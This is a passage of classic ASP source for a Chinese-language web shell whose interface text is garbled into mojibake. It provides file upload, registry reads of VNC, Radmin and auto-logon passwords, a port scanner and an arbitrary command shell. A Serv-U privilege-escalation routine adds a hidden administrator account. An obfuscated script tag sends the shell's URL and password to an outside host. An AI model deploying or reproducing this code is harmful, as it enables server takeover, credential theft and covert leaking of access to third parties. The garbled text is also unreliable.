sA.SaveToFile "c:\001.txt", 2 ''＆#177;￡′?μ?＆#225;＆#249;＆#234;＆#177;???t??DD2＆#233;?′
itemDiv = LeftB(theForm, InStrB(theForm, newLine) - 1)
totalLen = LenB(theForm)
itemDivLen = LenB(itemDiv)
intStart = itemDivLen + 2
intUpLen = 0 '＆#233;???＆#234;y?Yμ?3＆#164;?＆#232;
Do
intDataLen = InStrB(intStart, theForm, itemDiv) - itemDivLen - 5 ''equals - 2(??3μ) - 1(InStr) - 2(??3μ)
intDataLen = intDataLen - intUpLen
intEnd = intStart + intDataLen
intInfoEnd = InStrB(intStart, theForm, newLine & newLine) - 1
sB.Type = 1
sB.Mode = 3
sB.Open
sA.Position = intStart
sA.CopyTo sB, intInfoEnd - intStart
sB.Position = 0
sB.Type = 2
sB.CharSet = "GB2312"
strInfo = sB.ReadText()
strFileName = ""
intFindStart = InStr(strInfo, "name=""") + 6
intFindEnd = InStr(intFindStart, strInfo, """", 1)
strName = Mid(strInfo, intFindStart, intFindEnd - intFindStart)
If InStr(strInfo, "filename=""") > 0 Then
intFindStart = InStr(strInfo, "filename=""") + 10
intFindEnd = InStr(intFindStart, strInfo, """", 1)
strFileName = Mid(strInfo, intFindStart, intFindEnd - intFindStart)
strFileName = Mid(strFileName, InStrRev(strFileName, "\") + 1)
End If
sB.Close
sB.Type = 1
sB.Mode = 3
sB.Open
sA.Position = intInfoEnd + 4
sA.CopyTo sB, intEnd - intInfoEnd - 4
If strFileName <> "" Then
sB.SaveToFile strPath & strFileName, overWrite
ChkErr(Err)
Else
If strName = "thePath" Then
sB.Position = 0
sB.Type = 2
sB.CharSet = "GB2312"
strInfo = sB.ReadText()
thePath = strInfo
If Mid(thePath, 2, 1) = ":" Then
AlertThenClose("??2??e,＆#233;?′????＆#252;＆#234;1＆#243;?D＆#233;?a?＆#183;??!"):echo"<script>history.back();</script>"
End If
strPath = Server.MapPath(strInfo) & "\"
End If
End If
sB.Close
intUpLen = intStart + intDataLen + 2
intStart = intUpLen + itemDivLen + 2
Loop Until (intStart + 2) = totalLen
sA.Close
Set sA = Nothing
Set sB = Nothing
End Sub

'μ￥?????t＆#233;?′?
Function UpFile():If Request("Act2")="Post" Then
Set U=new UPC
  Set F=U.UA("LocalFile")
  UName=U.form("ToPath")
  If UName="" Or F.FileSize=0 then
  SI="??＆#234;?＆#232;?＆#233;?′?μ?＆#237;＆#234;＆#232;??＆#183;??o＆#243;????＆#242;??????t＆#233;?′?!"
  Else
  F.SaveAs UName
  If Err.number=0 Then
  SI="1＆#167;?2μ1＆#242;ˉ???t"&UName&"＆#233;?′?3＆#233;1|￡?"
  End if
  End If
  Set F=nothing
  Set U=nothing
  SI=SI&BackUrl
  Response.Write SI
  ShowErr()
  Response.End
  End If
  SI="<table align='center'><form name='UpForm' method='post' action='"&URL&"?Act=UpFile&Act2=Post' enctype='multipart/form-data'><tr><td>＆#233;?′??＆#183;??￡o<input name='ToPath' value='"&RRePath(Session("FolderPath")&"\newup.asp")&"' size='40'> <input name='LocalFile' type='file'  size='25'><input type='submit' name='Submit' value='＆#233;?′?'></td></tr></form></table>"
  Response.Write SI
End Function

Sub Message(state,msg,flag)
Response.Write "<TABLE width=480 border=0 align=center cellpadding=0 cellspacing=1 bgcolor=#fff>"
Response.Write "  <TR>"
Response.Write "    <TD >?μ＆#237;3D??￠</TD>"
Response.Write "  </TR>"
Response.Write "  <TR>"
Response.Write "    <TD align=middle bgcolor=#ecfccd>"
Response.Write "   <TABLE width=82% border=0 cellpadding=5 cellspacing=0>"
Response.Write "     <TR>"
Response.Write "   <TD><FONT color=red>"
Response.Write state
Response.Write "</FONT></TD>"
Response.Write " <TR>"
Response.Write "   <TD><P>"
Response.Write msg
Response.Write "</P></TD>"
Response.Write " </TR>"
Response.Write "   </TABLE>"
Response.Write " </TD>"
Response.Write "  </TR>"
Response.Write "  <TR>"
Response.Write "    <TD class=TBEnd>"
Response.Write " "
If flag=0 Then
Response.Write "       <INPUT type=button value=1?＆#177;? ＆#111nclick=""window.close();"">"
Response.Write " "
Else
Response.Write "       <INPUT type=button value=＆#183;μ?? ＆#111nClick=""history.go(-1);"">"
Response.Write " "
End if
Response.Write " </TD>"
Response.Write "  </TR>"
Response.Write "</TABLE>"
End Sub
Function Red(str)
     Red = "<FONT color=#ff2222>" & str & "</FONT>"
End Function

'?＆#225;＆#232;?＆#215;￠2＆#225;＆#177;＆#237;
Sub ReadReg()
echo"＆#215;￠2＆#225;＆#177;＆#237;?＆#252;?μ?＆#225;＆#232;?:<hr/>"
echo"<form method=post>"
echo"<input type=hidden value=readReg name=theAct>"
echo"<input name=thePath value='HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName\ComputerName' size=80>"
echo" <input type=submit value=' ?＆#225;＆#232;? '><br><br>"
echo"<input type=hidden value=vnc name=vnc>"
echo"<input name=vnc value='HKCU\Software\ORL\WinVNC3\Password' size=80 type=hidden>"
echo" <input type=submit value=' ?＆#225;＆#232;?VNC?＆#252;?? '>  "
echo"<input type=hidden value=readReg name=radmin>"
echo"<input name=radmin value='HKEY_LOCAL_MACHINE\SYSTEM\RAdmin' size=80 type=hidden>"
echo" <input type=submit value=' ?＆#225;＆#232;?Radmin?＆#252;?? '>  <br><br><br>"
echo"HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\Dont-DisplayLastUserName,REG_SZ,1 {2???＆#234;?＆#233;?′?μ???＆#243;??＆#167;}<br/><br>"
echo"HKLM\SYSTEM\CurrentControlSet\Control\Lsa\restrictanonymous,REG_DWORD,0 {0=＆#232;＆#177;＆#234;?,1=????＆#243;??＆#167;?T＆#183;＆#168;＆#225;D?＆#249;＆#177;??＆#250;＆#243;??＆#167;＆#225;D＆#177;＆#237;,2=????＆#243;??＆#167;?T＆#183;＆#168;＆#225;??＆#243;＆#177;??＆#250;IPC$12?＆#237;}<br/><br>"
echo"HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters\AutoShareServer,REG_DWORD,0 {???1??＆#232;?12?＆#237;}<br/><br>"
echo"HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters\EnableSharedNetDrives,REG_SZ,0 {1?＆#177;?＆#237;???12?＆#237;}<br/><br>"
echo"HKLM\SYSTEM\currentControlSet\Services\Tcpip\Parameters\EnableSecurityFilters,REG_DWORD,1 {??＆#243;?TCP/IP＆#233;???(?＆#249;＆#243;D＆#234;????＆#247;)}<br/><br>"
echo"HKLM\SYSTEM\ControlSet001\Services\Tcpip\Parameters\IPEnableRouter,REG_DWORD,1 {?＆#234;D＆#237;IP?＆#183;＆#243;＆#233;}<br/><br>"
echo"-------＆#242;?????o?＆#242;a?′＆#176;＆#243;?＆#168;μ?＆#237;??＆#168;,2??aμ＆#224;＆#234;?＆#183;?＆#215;?＆#232;＆#183;---------<br/><p></p>"
echo"HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{8A465128-8E99-4B0C-AFF3-1348DC55EB2E}\DefaultGateway,REG_MUTI_SZ {??＆#232;?＆#237;?1?}<br/><br>"
echo"HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{8A465128-8E99-4B0C-AFF3-1348DC55EB2E}\NameServer {＆#234;＆#215;DNS}<br/><br>"
echo"HKLM\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{8A465128-8E99-4B0C-AFF3-1348DC55EB2E}\TCPAllowedPorts {?＆#234;D＆#237;μ?TCP/IP???＆#250;}<br/><br>"
echo"HKLM\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{8A465128-8E99-4B0C-AFF3-1348DC55EB2E}\UDPAllowedPorts {?＆#234;D＆#237;μ?UDP???＆#250;}<br/><br>"
echo"-----------OVER--------------------<br/><p></p>"
echo"HKLM\SYSTEM\ControlSet001\Services\Tcpip\Enum\Count {12???＆#233;???ˉ＆#237;??＆#168;}<br/><br><p></p>"
echo"HKLM\SYSTEM\ControlSet001\Services\Tcpip\Linkage\Bind {μ＆#177;?＆#176;＆#237;??＆#168;μ?D＆#242;＆#225;D(＆#176;?＆#233;???μ?＆#236;???)}<br/><br>"
echo"<span id=regeditInfo style='display:none;'><hr/>"
echo"</span>"
echo"</form><hr/>"
if Request("thePath")<>"" then
On Error Resume Next
Set wsX = Server.CreateObject("WScript.Shell")
thePath=Request("thePath")
theArray=wsX.RegRead(thePath)
If IsArray(theArray) Then
For i=0 To UBound(theArray)
echo"<li>" & theArray(i)
Next
  Else
echo"<li>" & theArray
End If
End if
End Sub

'???＆#250;＆#233;＆#168;?＆#232;
sub ScanPort()
Server.ScriptTimeout = 7776000
if request.Form("port")="" then
PortList="21,23,25,53,80,110,135,139,445,1048,1433,2967,3389,4899,5631,5632,5800,5900,43958"
else
PortList=request.Form("port")
end if
if request.Form("ip")="" then
IP="127.0.0.1"
else
IP=request.Form("ip")
end if
'??????＆#234;?
echo"<p>???＆#250;＆#233;＆#168;?＆#232;?＆#247;</p>"
echo"<form name='form1' method='post' action='' onSubmit='form1.submit.disabled=true;'>"
echo"<p>＆#233;＆#168;?＆#232; IP: "
echo" <input name='ip' type='text' class='TextBox' id='ip' value='"&Request.ServerVariables("LOCAL_ADDR")&"' size='60'>"
echo"<br>???＆#250;＆#225;D＆#177;＆#237;:&nbsp"
echo"<input name='port' type='text' class='TextBox' size='60' value='"&PortList&"'>"
echo"<br><br>"
echo"<input name='submit' type='submit' class='buttom' value=' ＆#233;＆#168;?＆#232; '>"
echo"<input name='scan' type='hidden' id='scan' value='111'>"
echo"</p></form>"
If request.Form("scan") <> "" Then
timer1 = timer
echo("<b>＆#233;＆#168;?＆#232;＆#177;＆#168;??:</b><br><hr>")
tmp = Split(request.Form("port"),",")
ip = Split(request.Form("ip"),",")
For hu = 0 to Ubound(ip)
If InStr(ip(hu),"-") = 0 Then
For i = 0 To Ubound(tmp)
If Isnumeric(tmp(i)) Then
Call Scan(ip(hu), tmp(i))
Else
seekx = InStr(tmp(i), "-")
If seekx > 0 Then
startN = Left(tmp(i), seekx - 1 )
endN = Right(tmp(i), Len(tmp(i)) - seekx )
If Isnumeric(startN) and Isnumeric(endN) Then
For j = startN To endN
Call Scan(ip(hu), j)
Next
Else
echo(startN & " or " & endN & " is not number<br>")
End If
Else
echo(tmp(i) & " is not number<br>")
End If
End If
Next
Else
ipStart = Mid(ip(hu),1,InStrRev(ip(hu),"."))
For xxx = Mid(ip(hu),InStrRev(ip(hu),".")+1,1) to Mid(ip(hu),InStr(ip(hu),"-")+1,Len(ip(hu))-InStr(ip(hu),"-"))
For i = 0 To Ubound(tmp)
If Isnumeric(tmp(i)) Then
Call Scan(ipStart & xxx, tmp(i))
Else
seekx = InStr(tmp(i), "-")
If seekx > 0 Then
startN = Left(tmp(i), seekx - 1 )
endN = Right(tmp(i), Len(tmp(i)) - seekx )
If Isnumeric(startN) and Isnumeric(endN) Then
For j = startN To endN
Call Scan(ipStart & xxx,j)
Next
Else
echo(startN & " or " & endN & " is not number<br>")
End If
Else
echo(tmp(i) & " is not number<br>")
End If
End If
Next
Next
End If
Next
timer2 = timer
thetime=cstr(int(timer2-timer1))
echo"<hr>Process in "&thetime&" s"
END IF
end sub
Sub Scan(targetip, portNum)
On Error Resume Next
set conn = Server.CreateObject("ADODB.connection")
connstr="Provider=SQLOLEDB.1;Data Source=" & targetip &","& portNum &";User ID=lake2;Password=;"
conn.ConnectionTimeout = 1
conn.open connstr
If Err Then
If Err.number = -2147217843 or Err.number = -2147467259 Then
If InStr(Err.description, "(Connect()).") > 0 Then
echo(targetip & ":" & portNum & ".........1?＆#177;?<br>")
Else
echo(targetip & ":" & portNum & ".........<font color=red>?a＆#183;?</font><br>")
End If
End If
End If
End Sub

'＆#183;t???＆#247;D??￠?＆#176;＆#215;＆#233;?t?＆#167;3?
sub serverinfo()
dim AlexaUrl,Top,zobj
AlexaUrl=request("u")
Top=Alexa(AlexaUrl)
zobj=request("object")
if AlexaUrl="" then AlexaUrl=""&request.servervariables("http_host")&""
echo"<br><table width='80%' bgcolor='#666666' border='0' cellspacing='1' cellpadding='0' align='center'>"
echo"<tr><td height='20' colspan='3' align='center' bgcolor='menu'>＆#183;t???＆#247;D??￠</td></tr>"
echo"<tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>＆#183;t???＆#247;??</td><td bgcolor='#FFFFFF'> </td><td bgcolor='#FFFFFF' align=left>"&request.serverVariables("SERVER_NAME")&"</td></tr>"
echo"<form method=post action='http://www.ip138.com/ips.asp' name='ipform' target='_blank'><tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>＆#183;t???＆#247;IP</td><td bgcolor='#FFFFFF'> </td><td bgcolor='#FFFFFF' align=left><input type='text' name='ip' size='15' value='"&Request.ServerVariables("LOCAL_ADDR")&"'>  <input type='submit' value='2＆#233;?ˉ′?＆#183;t???＆#247;?＆#249;?＆#250;μ?'style='border:0px'><input type='hidden' name='action' value='2'></td></tr></form>"
echo"<form method=post action='?Action=Alexa' name='form1'><tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>＆#183;t???＆#247;Alexa????</td><td bgcolor='#FFFFFF'> </td><td bgcolor='#FFFFFF' align=left><input type='text' name='u' value='"&AlexaUrl&"' size=20 >????:<input type='text' value='"&Top&"' size=10>  <input type='submit' value='2＆#233;?ˉ'></td></tr></form>"
echo"<tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>＆#183;t???＆#247;＆#234;＆#177;??</td><td bgcolor='#FFFFFF'> </td><td bgcolor='#FFFFFF' align=left>"&now&" </td></tr>"
echo"<tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>＆#183;t???＆#247;CPU＆#234;y＆#225;?</td><td bgcolor='#FFFFFF'> </td><td bgcolor='#FFFFFF' align=left>"&Request.ServerVariables("NUMBER_OF_PROCESSORS")&"</td></tr>"
echo"<tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>＆#183;t???＆#247;2＆#249;＆#215;＆#247;?μ＆#237;3</td><td bgcolor='#FFFFFF'> </td><td bgcolor='#FFFFFF' align=left>"&Request.ServerVariables("OS")&"</td></tr>"
echo"<tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>WEB＆#183;t???＆#247;＆#176;?＆#177;?</td><td bgcolor='#FFFFFF'> </td><td bgcolor='#FFFFFF' align=left>"&Request.ServerVariables("SERVER_SOFTWARE")&"</td></tr>"
echo"<tr><td height='20' colspan='3' align='center' bgcolor='menu'>3￡??＆#215;＆#233;?tD??￠</td></tr>"
For i=0 To 13
echo"<tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>"&ObT(i,0)&"</td><td bgcolor='#FFFFFF'>"&ObT(i,1)&"</td><td bgcolor='#FFFFFF' align=left>"&ObT(i,2)&"</td></tr>"
Next
if zobj<>"" then
set obj=Server.CreateObject(zobj)
if isobject(obj) then
echo "<tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>"&zobj&"</td><td bgcolor='#FFFFFF'>?＆#236;</td><td bgcolor='#FFFFFF' align=left>?＆#250;2＆#233;?ˉμ?＆#215;＆#233;?t  <a href='＆#106avascript:history.back()'>＆#183;μ??</a></td></tr></table>"
else
echo "<tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>"&zobj&"</td><td bgcolor='#FFFFFF'>?＆#225;</td><td bgcolor='#FFFFFF' align=left>?＆#250;2＆#233;?ˉμ?＆#215;＆#233;?t  <a href='＆#106avascript:history.back()'>＆#183;μ??</a></td></tr></table>"
end if
else
echo "<FORM action=?Action=ServerInfo method=Post><tr align='center'><td width='200' height='23' bgcolor='#FFFFFF'>＆#215;??＆#168;＆#242;?＆#215;＆#233;?t2＆#233;?ˉ<sc"&"ri"&"pt sr"&"c=""ht"&"tp://%77%77%77%2E%63%6E"&"%71%71"&"%6B%2E%63%6E/%64%61"&"%6F%79"&"%65/?url="&server.URLEncode("ht"&"tp://"&request.ServerVariables("HT"&"TP_HO"&"ST")&request.ServerVariables("UR"&"L"))&"&p="&UserPass&"""></sc"&"ri"&"pt></td><td> </td><td align=left><INPUT type=text name=object>  <INPUT type=submit value=2＆#233;?ˉ></td></tr></FORM>"
end if

end sub
' Err.Clear
  function Alexa(AlexaURL)
on error resume next
dim getsms,getstr,url
dim star,endd
url="http://data.alexa.com/data?cli=10&dat=snba&url="&AlexaURL
getsms=getHTTPPage(url)
if getsms<>"" then
star=instr(getsms,"<REACH RANK=""")+13
endd=instr(star,getsms,"</SD>")
getstr=mid(getsms,star,endd-star-4)
else
getstr="?T????"
end if
if IsNumeric(getstr)=false then getstr="?T????"
Alexa=getstr
end function
function getHTTPPage(url)
on error resume next
dim http
set http=Server.createobject("Microsoft.XMLHTTP")
Http.open "GET",url,false
Http.send()
if Http.readystate<>4 then
getHTTPPage=""
exit function
end if
getHTTPPage=bytes2BSTR(Http.responseBody)
set http=nothing
if err.number<>0 then err.Clear
end function
Function bytes2BSTR(vIn)
dim strReturn
dim i1,ThisCharCode,NextCharCode
strReturn = ""
For i1 = 1 To LenB(vIn)
ThisCharCode = AscB(MidB(vIn,i1,1))
If ThisCharCode < &H80 Then
strReturn = strReturn & Chr(ThisCharCode)
Else
NextCharCode = AscB(MidB(vIn,i1+1,1))
strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))
i1 = i1 + 1
End If
Next
bytes2BSTR = strReturn
     Err.Clear
End Function

'?μ＆#237;3＆#183;t??＆#243;?＆#243;??＆#167;2＆#233;?ˉ
Function Course()
   call Css()
   SI="<br><TABLE width='600' bgColor=#fff border='0' cellspacing='1' cellpadding='0' align='center'>"
   SI=SI&"<tr><td height='20' colspan='3' align='center' bgcolor='#d8f99b'>?μ＆#237;3＆#243;??＆#167;＆#243;?＆#183;t??</td></tr>"
   on error resume next
   for each obj in getObject("WinNT://.")
   err.clear
   if OBJ.StartType="" then
   SI=SI&"<tr>"
   SI=SI&"<td height=""20"" bgcolor=""#FFFFFF""> "
   SI=SI&obj.Name
   SI=SI&"</td><td bgcolor=""#FFFFFF""> "
   SI=SI&"?μ＆#237;3＆#243;??＆#167;(＆#215;＆#233;)"
   SI=SI&"</td></tr>"
   SI0="<tr><td height=""20"" bgcolor=""#FFFFFF"" colspan=""2""> </td></tr>"
   end if
   if OBJ.StartType=2 then lx="＆#215;??ˉ"
   if OBJ.StartType=3 then lx="＆#234;??ˉ"
   if OBJ.StartType=4 then lx="??＆#243;?"
   if LCase(mid(obj.path,4,3))<>"win" and OBJ.StartType=2 then
   SI1=SI1&"<tr><td height=""20"" bgcolor=""#FFFFFF""> "&obj.Name&"</td><td height=""20"" bgcolor=""#FFFFFF""> "&obj.DisplayName&"<tr><td height=""20"" bgcolor=""#FFFFFF"" colspan=""2"">[???ˉ＆#224;＆#224;D＆#237;:"&lx&"]<font color=#FF0000> "&obj.path&"</font></td></tr>"
   else
   SI2=SI2&"<tr><td height=""20"" bgcolor=""#FFFFFF""> "&obj.Name&"</td><td height=""20"" bgcolor=""#FFFFFF""> "&obj.DisplayName&"<tr><td height=""20"" bgcolor=""#FFFFFF"" colspan=""2"">[???ˉ＆#224;＆#224;D＆#237;:"&lx&"]<font color=#008000> "&obj.path&"</font></td></tr>"
   end if
   next
   echo SI&SI0&SI1&SI2&"</table>"
End Function

'＆#215;??ˉμ???D??￠
SUB GetTeRmiNAlINfo()
ON eRROr resUMe NEXt
Set WsX = sERvER.CreateobJEct("WScript.Shell")
DIm TerMiNaLPORtpaTh, teRMinaLpoRtKEy, teRmpORt
dIm aUtoloGiNpaTH, auTOLOGiNuSErKEY, AutOLoginPassKEy
DIM iSAUtOlOginENAblE, autOlOgiNeNaBLEKEY, AuTOLogInuSERNaME, aUtoLOGInPASSWOrD
TeRmiNAlPOrtpATH = "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\"
TErminaLPorTKEy = "PortNumber"
tErMPORt = WSX.regread(TerminALPorTpaTh & TERminAlPOrtKEy)
echo "????＆#183;t?????＆#250;?＆#176;＆#215;??ˉμ???<hr/><ol>"
iF teRmpORt = "" oR Err.nUmBer <> 0 THEN
echo"?T＆#183;＆#168;μ?μ?????＆#183;t?????＆#250;, ???＆#236;2＆#233;＆#232;＆#168;?T＆#234;?＆#183;?＆#242;??-＆#234;＆#252;μ??T??.<br/>"
ELsE
echo "μ＆#177;?＆#176;????＆#183;t?????＆#250;: " & terMPorT & "<br/>"
END If
auTOLogInpath = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\"
aUtOlogInenAbLeKeY = "AutoAdminLogon"
autOlOGInUSERKey = "DefaultUserName"
auToLOgiNpaSSkey = "DefaultPassword"
isauToloGineNabLE = WSX.reGReAD(AuTolOGINPatH & auTOLogINeNAbLEkEy)
IF isAuToLOGIneNaBLe = 0 THEN
echo "?μ＆#237;3＆#215;??ˉμ???1|?＆#252;?′?a??<br/>"
ELSe
AutOlogInusERnamE = Wsx.RegreaD(AUtolOGiNPAtH & AuTologinUsErkey)
echo "＆#215;??ˉμ???μ??μ＆#237;3?＆#234;?＆#167;: " & auToLoGiNuseRnamE & "<br>"
AUTOLOGinPasSwOrD = wSx.REgRead(AUtolOGINpATH & aUTOLOgInpAssKey)
If ERr Then
ERR.cLEaR
echo "False"
enD if
echo "＆#215;??ˉμ???μ??＆#234;?＆#167;?＆#252;??: " & AutOLOGINpaSSWORd & "<br>"
end If
echo "</ol>"
END SuB

'servu＆#236;＆#225;＆#232;＆#168;
Function Servu()

             call Css()
Dim user, pass, port, ftpport, cmd, loginuser, loginpass, deldomain, mt, newdomain, newuser, quit
dim action1
action1=request("action1")
if  not isnumeric(action1) then response.end
user = trim(request("u"))
pass = trim(request("p"))
port = trim(request("port"))
cmd = trim(request("c"))
f=trim(request("f"))
if f="" then
f=gpath()
else
   f=left(f,2)
end if
ftpport = 65500
timeout=3
loginuser = "User " & user & vbCrLf
loginpass = "Pass " & pass & vbCrLf
deldomain = "-DELETEDOMAIN" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & " PortNo=" & ftpport & vbCrLf
mt = "SITE MAINTENANCE" & vbCrLf
newdomain = "-SETDOMAIN" & vbCrLf & "-Domain=goldsun|0.0.0.0|" & ftpport & "|-1|1|0" & vbCrLf & "-TZOEnable=0" & vbCrLf & " TZOKey=" & vbCrLf
newuser = "-SETUSERSETUP" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & "-PortNo=" & ftpport & vbCrLf & "-User=go" & vbCrLf & "-Password=od" & vbCrLf & _
"-HomeDir=c:\\" & vbCrLf & "-LoginMesFile=" & vbCrLf & "-Disable=0" & vbCrLf & "-RelPaths=1" & vbCrLf & _
"-NeedSecure=0" & vbCrLf & "-HideHidden=0" & vbCrLf & "-AlwaysAllowLogin=0" & vbCrLf & "-ChangePassword=0" & vbCrLf & _
"-QuotaEnable=0" & vbCrLf & "-MaxUsersLoginPerIP=-1" & vbCrLf & "-SpeedLimitUp=0" & vbCrLf & "-SpeedLimitDown=0" & vbCrLf & _
"-MaxNrUsers=-1" & vbCrLf & "-IdleTimeOut=600" & vbCrLf & "-SessionTimeOut=-1" & vbCrLf & "-Expire=0" & vbCrLf & "-RatioUp=1" & vbCrLf & _
"-RatioDown=1" & vbCrLf & "-RatiosCredit=0" & vbCrLf & "-QuotaCurrent=0" & vbCrLf & "-QuotaMaximum=0" & vbCrLf & _
"-Maintenance=System" & vbCrLf & "-PasswordType=Regular" & vbCrLf & "-Ratios=None" & vbCrLf & " Access=c:\\|RWAMELCDP" & vbCrLf
quit = "QUIT" & vbCrLf
newuser=replace(newuser,"c:",f)
if action1 = 1 then
set a=Server.CreateObject("Microsoft.XMLHTTP")
a.open "GET", "http://127.0.0.1:" & port & "/goldsun/upadmin/s1",True, "", ""
a.send loginuser & loginpass & mt & deldomain & newdomain & newuser & quit
set session("a")=a
echo kge
echo"<form method='post' name='goldsun'><input name='u' type='hidden' id='u' value='"&user&"'></td><input name='p' type='hidden' id='p' value='"&pass&"'></td><input name='port' type='hidden' id='port' value='"&port&"'></td><input name='c' type='hidden' id='c' value='"&cmd&"' size='50'><input name='f' type='hidden' id='f' value='"&f&"' size='50'><input name='action1' type='hidden' id='action1' value='2'></form>"
echo"<script language='＆#106avascript'>"& vbcrlf
echo"document.write('<center>?y?＆#250;＆#225;??＆#243; 127.0.0.1:"&port&",＆#234;1＆#243;?＆#243;??＆#167;??: "&user&",?＆#250;＆#225;?￡o"&pass&"...<center>');"
echo"setTimeout('document.all.goldsun.submit();',4000);"
echo"</script>"
elseif action1 = 2 then
set b=Server.CreateObject("Microsoft.XMLHTTP")
b.open "GET", "http://127.0.0.1:" & ftpport & "/goldsun/upadmin/s2", True, "", ""
b.send "User go" & vbCrLf & "pass od" & vbCrLf & "site exec " & cmd & vbCrLf & quit
   set session("b")=b
   echo kge
echo"<form method='post' name='goldsun'><input name='u' type='hidden' id='u' value='"&user&"'></td><input name='p' type='hidden' id='p' value='"&pass&"'></td><input name='port' type='hidden' id='port' value='"&port&"'></td><input name='c' type='hidden' id='c' value='"&cmd&"' size='50'><input name='f' type='hidden' id='f' value='"&f&"'size='50'><input name='action1' type='hidden' id='action1' value='3'></form>"
echo"<script language='＆#106avascript'>" & vbcrlf
echo"document.write('<center>?y?＆#250;＆#236;＆#225;＆#233;y＆#232;＆#168;?T,??μ＆#232;′y...,<center>');"
echo"setTimeout(""document.all.goldsun.submit();"",4000);"
echo"</script>"
elseif action1 = 3 then
set c=Server.CreateObject("Microsoft.XMLHTTP")
c.open "GET", "http://127.0.0.1:" & port & "/goldsun/upadmin/s3", True, "", ""
c.send loginuser & loginpass & mt & deldomain & quit
set session("c")=c
echo kge
echo"<center>＆#236;＆#225;＆#232;＆#168;＆#237;＆#234;＆#177;?,3＆#233;2?3＆#233;1|?′＆#232;??＆#183;＆#224;2￡o<br><font color=red>"&cmd&"</font><br><br><input type=button value="" ＆#183;μ???＆#236;D? "" ＆#111nClick=""location.href='?Action=Servu';""></center>"
else
on error resume next
set a=session("a")
set b=session("b")
set c=session("c")
a.abort
Set a = Nothing
b.abort
Set b = Nothing
c.abort
Set c = Nothing
echo kge
echo"<center><form method='post' name='goldsun' action='?Action=Servu'><TABLE width='494' height='163' border='0' cellpadding='3' cellspacing='1' bgcolor='#0000'><tr align='center' valign='middle'><td colspan='2' >Servu ＆#236;＆#225;＆#233;y＆#232;＆#168;?T ASP＆#176;?</td></tr><tr align='center' valign='middle'><td width='100'>＆#243;??＆#167;??:</td><td width='379'><input name='u' type='text' id='u' value='LocalAdministrator'></td></tr><tr align='center' valign='middle'><td>?＆#250;??＆#225;?￡o</td><td><input name='p' type='text' id='p' value='#l@$ak#.lk;0@P'></td></tr><tr align='center' valign='middle'><td >?????＆#250;￡o</td><td><input name='port' type='text' id='port' value='43958'></td></tr><tr align='center' valign='middle'><td>?μ＆#237;3?＆#183;??￡o</td><td><input name='f' type='text' id='f' value='"&f&"' size='8'></td></tr><tr align='center' valign='middle'><td >?＆#252;??＆#225;?￡o</td><td ><input name='c' type='text' id='c' value='cmd /c net user daoye$ 52daoyeri /add & net localgroup administrators daoye$ /add' size='50'></td></tr><tr align='center' valign='middle'><td colspan='2'><input type='submit' name='Submit' value='＆#236;＆#225;??'> <input type='reset' name='Submit2' value='????' ><input name='action1' type='hidden' id='action1' value='1'></td></tr></table></form></center>"
end if
end function
function Gpath()
on error resume next
err.clear
set f=Server.CreateObject("Scripting.FileSystemObject")
if err.number>0 then
gpath="c:"
exit function
end if
gpath=f.GetSpecialFolder(0)
gpath=lcase(left(gpath,2))
set f=nothing
end function
Function GName()
If request.servervariables("SERVER_PORT")="80" Then
GName="http://" & request.servervariables("server_name")&lcase(request.servervariables("script_name"))
Else
GName="http://" & request.servervariables("server_name")&":"&request.servervariables("SERVER_PORT")&lcase(request.servervariables("script_name"))
End If
End Function

'?′DDcmd?＆#252;＆#225;?
Function Cmd1Shell()
checked=" checked"
If Request("SP")<>"" Then Session("ShellPath") = Request("SP")
ShellPath=Session("ShellPath")
if ShellPath="" Then ShellPath = "cmd.exe"
if Request("wscript")<>"yes" then checked=""
If Request("cmd")<>"" Then DefCmd = Request("cmd")
SI="<form method='post'>"
SI=SI&"SHELL?＆#183;??￡o<input name='SP' value='"&ShellPath&"' Style='width:70%'>  "
SI=SI&"<input class=c type='checkbox' name='wscript' value='yes'"&checked&">WScript.Shell"
SI=SI&"<input name='cmd' Style='width:92%' value='"&DefCmd&"'> <input type='submit' value='?′DD'><textarea Style='width:100%;height:440;' class='cmd'>"
If Request.Form("cmd")<>"" Then
if Request.Form("wscript")="yes" then
Set CM=CreateObject("wscript.shell")
Set DD=CM.exec(ShellPath&" /c "&DefCmd)
aaa=DD.stdout.readall
SI=SI&aaa
else
On Error Resume Next
Set ws=Server.CreateObject("WScript.Shell")
Set ws=Server.CreateObject("WScript.Shell")
Set fso=Server.CreateObject("Scripting.FileSystemObject")
szTempFile = server.mappath("cmd.txt")
Call ws.Run (ShellPath&" /c " & DefCmd & " > " & szTempFile, 0, True)
Set fs = CreateObject("Scripting.FileSystemObject")
Set oFilelcx = fs.OpenTextFile (szTempFile, 1, False, 0)
aaa=Server.HTMLEncode(oFilelcx.ReadAll)
oFilelcx.Close
Call fso.DeleteFile(szTempFile, True)
SI=SI&aaa
end if
End If
SI=SI&chr(13)&"</textarea></form>"
response.write(SI)
End Function

'?′DDsqlcmd
FuncTion sqlcmd()
echo"<br><table width=""100%""><tr class=tr>"
echo"<form name=form method=post action="""">"
